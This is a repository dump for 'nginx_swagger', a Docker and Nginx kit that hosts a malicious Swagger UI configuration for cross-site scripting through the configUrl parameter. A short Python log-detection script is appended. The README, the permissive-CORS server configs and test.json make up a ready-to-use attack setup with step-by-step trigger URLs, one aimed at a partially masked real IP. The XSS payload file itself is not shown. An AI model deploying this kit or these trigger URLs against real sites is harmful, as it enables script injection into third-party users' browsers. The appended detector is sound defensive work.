├── 1_20220611204136.png
├── 2_20220611204136.png
├── README.md
├── configuration
    ├── ssl.conf
    └── swagger.conf
├── docker-compose.yml
└── www
    ├── test.json
    └── test.yaml


/1_20220611204136.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/coffeehb/nginx_swagger/f968869146d4a4554136646389597c4a46032028/1_20220611204136.png
--------------------------------------------------------------------------------
/2_20220611204136.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/coffeehb/nginx_swagger/f968869146d4a4554136646389597c4a46032028/2_20220611204136.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# nginx_swagger
This project builds an Nginx server to assist in testing the Swagger XSS vulnerability.

## Usage

**1. Change the VPS IP in test.json to your VPS address**

**2. Modify the XSS payload in test.yaml**

**3. Start Nginx**

The default port is 8443.

    docker-compose up -d

**4. Trigger the vulnerability**

http://TARGET/swagger-ui/index.html?configUrl=https://VPS_IP/test.json

# How the vulnerability works
![avatar](./1_20220611204136.png)

# Triggering the vulnerability

http://1.116.xxx.112:8089/swagger-ui/index.html?configUrl=https://VPS_IP:8443/test.json

Note: if the target is an HTTPS site, your VPS may need to be configured for HTTPS; I have not tested this.

# Result
![avatar](./2_20220611204136.png)

--------------------------------------------------------------------------------
/configuration/ssl.conf:
--------------------------------------------------------------------------------
# TLS listener. Port 8444 is not published in docker-compose.yml.
server {
    listen 8444 ssl;
    root /usr/share/nginx/html;
    server_name console.xxxxx.cn;
    ssl_certificate console.xxxxx.cn_bundle.crt;
    ssl_certificate_key console.xxxxx.cn.key;
    ssl_session_timeout 5m;
    ssl_protocols TLSv1.2 TLSv1.3;
    ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:HIGH:!aNULL:!MD5:!RC4:!DHE;
    ssl_prefer_server_ciphers on;
    location / {
        # Permissive CORS: any origin may fetch the files served from here.
        add_header Access-Control-Allow-Origin *;
        add_header Access-Control-Allow-Methods 'GET, POST, OPTIONS';
        add_header Access-Control-Allow-Headers 'DNT,X-Mx-ReqToken,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Authorization';
    }
}

--------------------------------------------------------------------------------
/configuration/swagger.conf:
--------------------------------------------------------------------------------
# Plain-HTTP listener serving the files in www/.
server {
    listen 8443;

    root /usr/share/nginx/html;

    index index.html;

    server_name _;
    location / {
        # Permissive CORS: any origin may fetch the files served from here.
        add_header Access-Control-Allow-Origin *;
        add_header Access-Control-Allow-Methods 'GET, POST, OPTIONS';
        add_header Access-Control-Allow-Headers 'DNT,X-Mx-ReqToken,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Authorization';
    }
}

--------------------------------------------------------------------------------
/docker-compose.yml:
--------------------------------------------------------------------------------
version: '2'
services:
  nginx:
    image: vulhub/nginx:1
    volumes:
      # Nginx server blocks from configuration/
      - ./configuration:/etc/nginx/conf.d
      # Static files (test.json, test.yaml) from www/
      - ./www/:/usr/share/nginx/html/
    ports:
      - "8443:8443"

--------------------------------------------------------------------------------
/www/test.json:
--------------------------------------------------------------------------------
{
  "url": "http://VPS:8443/test.yaml",
  "urls": [
    {
      "url": "http://VPS:8443/test.yaml",
      "name": "Foo"
    }
  ]
}

--------------------------------------------------------------------------------
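
For defenders, the trigger URL shown in the README leaves a recognisable trace in the target's access log: a `swagger-ui` request whose `configUrl` parameter names an external host. The following detection sketch is an added example, not part of the nginx_swagger repository; the function names, the trusted-host allowlist and the log lines are constructed for illustration and assume the nginx "combined" log format.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Client IP and request target from a "combined"-format access-log line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

def _safe_split(url):
    """urlsplit that returns None instead of raising on a malformed authority."""
    try:
        return urlsplit(url)
    except ValueError:
        return None

def find_config_overrides(log_lines, trusted_hosts=(), params=("configUrl",)):
    """Return (client_ip, param, remote_host) for each Swagger UI request whose
    watched query parameter points at a host that is not in trusted_hosts."""
    trusted = {h.lower() for h in trusted_hosts}
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        target = _safe_split(m.group("target")) if m else None
        if target is None or "swagger-ui" not in target.path.lower():
            continue
        # parse_qs percent-decodes values, so an encoded URL is caught as well.
        for name, values in parse_qs(target.query).items():
            if name not in params:
                continue
            for value in values:
                remote = _safe_split(value.strip())
                host = remote.hostname if remote else None
                # Relative values ("/v3/api-docs/...") have no host and are ignored.
                if host and host.lower() not in trusted:
                    hits.append((m.group("ip"), name, host.lower()))
    return hits

# Constructed sample lines (documentation-range addresses, hypothetical hosts).
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Jun/2022:20:41:36 +0000] "GET /swagger-ui/index.html?configUrl=https://198.51.100.7:8443/test.json HTTP/1.1" 200 1425 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Jun/2022:20:42:01 +0000] "GET /swagger-ui/index.html?configUrl=/v3/api-docs/swagger-config HTTP/1.1" 200 1425 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [11/Jun/2022:20:43:10 +0000] "GET /swagger-ui/index.html?configUrl=https%3A%2F%2F198.51.100.7%3A8443%2Ftest.json HTTP/1.1" 200 1425 "-" "Mozilla/5.0"',
    '203.0.113.12 - - [11/Jun/2022:20:44:00 +0000] "GET /swagger-ui/index.html?configUrl=https://api.example.com/swagger-config.json HTTP/1.1" 200 1425 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_config_overrides(SAMPLE_LOG, trusted_hosts=["api.example.com"]):
        print(hit)
```

Pass the hosts your own deployment legitimately loads Swagger configuration from as `trusted_hosts`; every remaining hit is a request that asked Swagger UI to load its configuration from somewhere else.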